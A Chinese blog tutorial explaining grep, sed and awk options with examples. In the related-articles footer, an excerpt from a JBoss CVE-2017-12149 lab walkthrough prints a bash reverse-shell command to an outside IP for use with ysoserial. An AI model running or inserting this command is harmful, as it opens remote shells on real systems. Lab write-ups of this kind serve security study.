Linux-文本处理三剑客:grep、sed-和-awk

awk、grep、sed是linux操作文本的三大利器,合称文本三剑客,也是必须掌握的linux命令之一。三者的功能都是处理文本,但侧重点各不相同,其中属awk功能最强大,但也最复杂。grep更适合单纯的查找或匹配文本,sed更适合编辑匹配到的文本,awk更适合格式化文本,对文本进行较复杂格式处理。

grep

Linux 系统中 grep 命令是一种强大的文本搜索工具,它能使用正则表达式搜索文本,并把匹配的行打印出来。grep全称是 Global Regular Expression Print,表示全局正则表达式版本,它的使用权限是所有用户。

grep可用于shell脚本,因为grep通过返回一个状态值来说明搜索的状态,如果模板搜索成功,则返回0,如果搜索不成功,则返回1,如果搜索的文件不存在,则返回2。我们利用这些返回值就可进行一些自动化的文本处理工作。

命令的基本格式:

grep [option] pattern file

grep 常用的参数如下:

  • -A<行数 x>:除了显示符合范本样式的那一列之外,并显示该行之后的 x 行内容,A其实是after意思。
  • -B<行数 x>:除了显示符合样式的那一行之外,并显示该行之前的 x 行内容,B的意思before。
  • -C<行数 x>:除了显示符合样式的那一行之外,并显示该行之前后的 x 行内容,C是啥意思我不懂,哈哈。
  • -c:小写的c就是统计匹配的行数,c的意思count的意思。
  • -e:实现多个选项间的逻辑or 关系。
  • -E: 扩展的正则表达式。
  • -f 文件名:从文件获取 PATTERN 匹配。
  • -F :相当于fgrep,直接输入固定匹配,就是不会模糊匹配
  • -i :–ignore-case 忽略字符大小写的差别。
  • -n:显示匹配的行号。
  • -o:仅显示匹配到的字符串。
  • -q: 静默模式,不输出任何信息。
  • -s:不显示错误信息。
  • -v:显示不被 pattern 匹配到的行,相当于[^] 反向匹配
  • -w :匹配 整个单词

前三个 A、B、C 参数很容易理解,举个栗子,假设我们有一个文件,文件名是 test.log,内容是从 1 到 9,每个数字一行:
image.png

ps:搜索http-nio-8089-exec-13线程,显示匹配成功后两行。
image.png
ps:匹配http-nio-8089-exec-13到线程,匹配成功后,前10行显示。

我们再用C的参数查询看看
image.png
ps:如我们所料,匹配成功后,显示前后5行。

然后我们再来看看-c写的情况,就是匹配的行,比如我们相差一个tomcat的有多线程,我们可以用grep -c Thread test.log,如图
image.png

grep -e命令是实现多个匹配之间的或关系,我们可以同时查询线程13,或者14
如图
image.png
我们继续延时-F,匹配固定的字符串
image.png
上面没有http**的字符串

grep -f 文件名的使用方法是把后面这个文件里的内容当做pattern。就是我们把需要匹配的内容在文件里面而已,如下图
image.png
grep -i --ignore-case作用是忽略大小写。

grep -n显示匹配的行号,就是多显示了个行号,不用细说。
如图,
image.png
我们来说说-o的参数,他只会输入匹配到字符串,不会输出整行的内容,如图
image.png
这里-v就很有意思,你们有没有遇到很这样的需求,一个配置文件很多注释,怎么样输出过来掉注释呢。-v会帮到我们如图所示:
image.png

grep -w匹配整个单词,只有完全符合pattern的单次才会匹配到
image.png

sed

sed 命令的作用是利用脚本来处理文本文件。使用方法:

sed [-hnV][-e<script>][-f<script文件>][文本文件]

参数说明:

  • -e

动作说明:

  • a:新增, a 的后面可以接字串,而这些字串会在新的一行出现(目前的下一行)~
  • c:取代, c 的后面可以接字串,这些字串可以取代 n1,n2 之间的行!
  • d:删除,因为是删除啊,所以 d 后面通常不接任何咚咚;
  • i:插入, i 的后面可以接字串,而这些字串会在新的一行出现(目前的上一行);
  • p:打印,亦即将某个选择的数据印出。通常 p 会与参数 sed -n 一起运行~
  • s:取代,通常这个 s 的动作可以搭配正规表示法,例如 1,20s/old/new/g 。

下面我们举例说明
添加a或者i
我们来说说a,a的前面如果接数字,意思是新增到多少行的下面,a的后面是加"\添加的内容"如图
image.png
但是注意,这个只是将文字处理了,没有写入到文件里,文件里还是之前的内容。

如果a的前面是字符串,那就是做匹配用的用如图
image.png

参数i和a用法差不多,这里不做赘述

删除d
删除的字符是d,用法跟前面也很相似,就不赘述,例子如下:
image.png

替换c
替换也是一样,字符是c。举个栗子:

image.png
匹配到aaaa之后,替换成了bbbbb

替换还有个字符是 s,但是用法由不太一样了,最常见的用法:sed 's/old/new/g’其中old代表想要匹配的字符,new是想要替换的字符,比如:
image.png
g前还可以跟一个数字,数字代表一行中出现第几个,比较一行字不止一个字符串能匹配到
ps: 直接写那个命令是不会更改源文件的,需要加上一个-i的参数,比如:sed -i ‘s/1.0.0.6/1.0.0.7/’ /root/data/code-s3201/publish_codex/deploy/db.properties

awk

awk是一个强大的文本分析工具,相对于grep的查找,sed的编辑,awk在其对数据分析并生成报告时,显得尤为强大。简单来说awk就是把文件逐行的读入,以空格为默认分隔符将每行切片,切开的部分再进行各种分析处理。
语法

awk [选项参数] 'script' var=value file(s)
或
awk [选项参数] -f scriptfile var=value file(s)

参数说明:

  • -F fs or --field-separator fs 指定输入文件折分隔符,fs是一个字符串或者是一个正则表达式,如-F:。
  • -v var=value or --asign var=value 赋值一个用户定义变量。
  • -f scripfile or --file scriptfile 从脚本文件中读取awk命令。

基本用法
最基本的用法是awk 动作 文件名。
然后输入awk '{print $1,$4}' test就可以看到:
image.png

对比可以很清楚的发现,这行语句的作用是打印每行的第一个和第四个单词。这里如果是$0的话就是把整行都输出出来。

awk -F命令可以指定使用哪个分隔符,默认是空格或者 tab 键:

image.png

变量
awk中有不少内置的变量,比如$NF代表的是分割后的字段数量,相当于取最后一个。
image.png
可以看出都是每行的最后一项。

其他的内置变量还有,这里就不一一演示了:

  • FILENAME:当前文件名
  • FS:字段分隔符,默认是空格和制表符。
  • RS:行分隔符,用于分割每一行,默认是换行符。
  • OFS:输出字段的分隔符,用于打印时分隔字段,默认为空格。
  • ORS:输出记录的分隔符,用于打印时分隔记录,默认为换行符。
  • OFMT:数字输出的格式,默认为%.6g。

函数
awk还提供了一些内置函数,方便对原始数据的处理。主要如下:

  • toupper():字符转为大写。
  • tolower():字符转为小写。
  • length():返回字符串长度。
  • substr():返回子字符串。
  • sin():正弦。
  • cos():余弦。
  • sqrt():平方根。
  • rand():随机数。

条件
awk允许指定输出条件,只输出符合条件的行。输出条件要写在动作的前面:

awk '条件 动作' 文件名
➜ `awk -F, '$2!="" {print $2}' test`
apple

最后说一句,在linux界,盛行着两句话,第一个是linux一切皆是文件,第二是有问题找男人,查询命令man xxx。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/419261.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Window下编译OpenJDK17

本文详细介绍Window下如何编译OpenJDK17&#xff0c;包含源码路径&#xff0c;各工具下载地址&#xff0c;严格按照文章中的步骤来操作&#xff0c;你将获得一个由自己亲手编译出的jdk。 一、下载OpenJDK17源码 下载地址&#xff1a;GitHub - openjdk/jdk at jdk-1735 说明&a…

【重学 MySQL】二十、运算符的优先级

【重学 MySQL】二十、运算符的优先级 MySQL 运算符的优先级&#xff08;由高到低&#xff09;注意事项示例 在 MySQL 中&#xff0c;运算符的优先级决定了在表达式中各个运算符被计算的先后顺序。了解运算符的优先级对于编写正确且高效的 SQL 语句至关重要。以下是根据高权威性…

神仙公司名单(北京)

神仙公司&#xff08;北京&#xff09; 接着奏乐接着舞&#xff0c;神仙公司系列。 这次写之前几期评论区呼声极高的城市&#xff1a;北京。 北京&#xff0c;是许多人外出打工的梦想之都&#xff0c;是年轻人逃离农村的终点站。 在近两年的就业蓝皮书「外省籍毕业生占比较高城…

react文件详情

1、node_modules&#xff1a;存放项目所依赖的一些第三方包文件 2、public&#xff1a;静态资源文件夹 favicon.ico&#xff1a;导航图标 index.html&#xff1a;项目首页的html模版 logo192.png&#xff1a;logo图片 logo512.png&#xff1a;logo图片 manifest.json&#…

鸿蒙轻内核M核源码分析系列十九 Musl LibC

往期知识点记录&#xff1a; 鸿蒙&#xff08;HarmonyOS&#xff09;应用层开发&#xff08;北向&#xff09;知识点汇总 轻内核M核源码分析系列一 数据结构-双向循环链表 轻内核M核源码分析系列二 数据结构-任务就绪队列 鸿蒙轻内核M核源码分析系列三 数据结构-任务排序链表 轻…

前端:HTML、CSS、JS、Vue

1 前端 内容概要 了解前端三件套(HTML、CSS、JS)在前端所起的作用掌握HTML标签的功能&#xff0c;掌握重要标签(a标签&#xff0c;form标签)了解CSS了解JS的基础语法掌握Vue的基础语法重点掌握Vue项目怎么启动项目掌握前后端分离是什么。前端做什么事情&#xff0c;后端做什么…

2024年第十五届蓝桥杯青少组国赛撞期GESP认证、放弃那个?

昨天蓝桥杯青少组官网发布了速查|第十五届蓝桥杯大赛青少组省赛成绩查询&#xff0c;首先恭喜2024年蓝桥杯青少组省赛一等奖的同学晋级蓝桥杯大赛青少组国赛&#xff0c;蓝桥杯青少组国赛的时间为2024年9月7日&#xff0c;CCF GESP编程能力等级认证也在同一天开始&#xff0c;同…

云服务器部署DB-GPT项目

项目介绍 DB-GPT 是一个将大语言模型LLM与数据库结合的开源项目。它主要研究如何使预训练的大规模语言模型&#xff08;如 GPT&#xff09;能够直接与数据库交互&#xff0c;以生成更加准确和信息丰富的回答。这个项目通过特殊的训练方法&#xff0c;教会模型理解和生成能够进行…

vue+ThreeJS:从0 到1 搭建开发环境

文章目录 一、下载安装&#xff08;懒人版&#xff09;二、顺序安装1&#xff0c;下载安装nodejs2&#xff0c;安装vue-cli3&#xff0c;创建vue-three 项目。4&#xff0c;安装threeJS5&#xff0c;安装element UI &#xff08;选装&#xff09;最终package.json文件如下&…

Arch - 架构安全性_授权(Authorization)

文章目录 OverView授权&#xff08;Authorization&#xff09;RBAC&#xff1a; 概述RBAC&#xff1a;基于角色的访问控制RBAC&#xff1a;主要元素 OAuth2&#xff1a;面向第三方应用的认证授权协议业务场景OAuth2的工作流程OAuth2 四种不同的授权方式授权码模式&#xff08;A…

Jboss远程代码执行漏洞(CVE-2017-12149)

还是先开启环境 浏览器访问跟上一个一模一样页面 还是用ysoserial.jar工具 然后准备好反弹shell的命令&#xff0c;需要对其进行base64加密 //反弹shell命令&#xff0c;注意替换为自己的 bash -i >& /dev/tcp/192.168.75.162/6666 0>&1 //base64加密 YmFzaCAt…

1-9 图像膨胀 opencv树莓派4B 入门系列笔记

目录 一、提前准备 二、代码详解 kernel np.ones((3, 3), np.uint8) _, binary_image cv2.threshold(image, 127, 255, cv2.THRESH_BINARY) dilated_image cv2.dilate(binary_image, kernel, iterations1) 三、运行现象 四、完整代码 五、完整工程贴出 一、提前准备 …

PowerShell 脚本自动化 Windows 工作开发流程

在 Windows 环境中&#xff0c;PowerShell 是一个强大且灵活的脚本语言&#xff0c;它不仅能与 Windows 系统深度集成&#xff0c;还能够进行任务自动化处理。对于开发者和系统管理员而言&#xff0c;编写 PowerShell 脚本来自动化常见的工作流程&#xff0c;能显著提升生产效率…

CTFHub技能树-Git泄漏-Log

目录 一、前提知识 1.git泄漏原理 ​编辑 2.git文件泄漏造成后果 3.利用方法 (1) GitHack是一个.git泄露利用脚本&#xff0c;通过泄露的.git文件夹下的文件&#xff0c;还原重建工程源代码。渗透测试人员、攻击者&#xff0c;可以进一步审计代码&#xff0c;挖掘&#x…

关于C++你应该知道的知识:C/C++内存管理

目录 &#x1f31e;0.前言 &#x1f688;1 . C/C内存分布 &#x1f688;2、C语言中动态内存管理方式 &#x1f688;3 . C中动态内存管理 &#x1f69d;3.1 new/delete操作内置类型 &#x1f69d;3.2 new和delete操作自定义类型 &#x1f688;4 . operator new 与 operator…

python编程知识(实现数据加密和解密)

&#x1f468;‍&#x1f4bb;个人主页&#xff1a;开发者-曼亿点 &#x1f468;‍&#x1f4bb; hallo 欢迎 点赞&#x1f44d; 收藏⭐ 留言&#x1f4dd; 加关注✅! &#x1f468;‍&#x1f4bb; 本文由 曼亿点 原创 &#x1f468;‍&#x1f4bb; 收录于专栏&#xff1a…

html 页面引入 vue 组件之 http-vue-loader.js

一、http-vue-loader.js http-vue-loader.js 是一个 Vue 单文件组件加载器&#xff0c;可以让我们在传统的 HTML 页面中使用 Vue 单文件组件&#xff0c;而不必依赖 Node.js 等其他构建工具。它内置了 Vue.js 和样式加载器&#xff0c;并能自动解析 Vue 单文件组件中的所有内容…

JDK 8 升级 17 及 springboot 2.x 升级 3.x 指南

文章目录 JDK 8 升级 17简介javax.* 包移到 jakarta.*maven pom 中更新 java 版本 springboot 2.x 升级 3.xspring-boot 与 cloud、alibaba-cloud 的版本对应redis 默认配置调整SpringBoot 3.x 整合 Querydsl其他注意事项 maven 及 maven 插件的版本升级maven 版本升级maven-co…

HUAWEI华为MateBook B5-420 i5 集显(KLCZ-WXX9,KLCZ-WDH9)原装出厂Windows10系统文件下载

适用型号&#xff1a;KLCZ-WXX9、KLCZ-WDH9 链接&#xff1a;https://pan.baidu.com/s/12xnaLtcPjZoyfCcJUHynVQ?pwdelul 提取码&#xff1a;elul 华为原装系统自带所有驱动、出厂主题壁纸、系统属性联机支持标志、系统属性专属LOGO标志、华为浏览器、Office办公软件、华为…

握 手 问 题

目录 一&#xff1a;问题描述 二&#xff1a;思路: 三&#xff1a;代码&#xff1a; 四&#xff1a;结果&#xff1a;1204 一&#xff1a;问题描述 小蓝组织了一场算法交流会议&#xff0c;总共有50 5050 人参加了本次会议。在会议上&#xff0c;大家进行了握手交流。按照…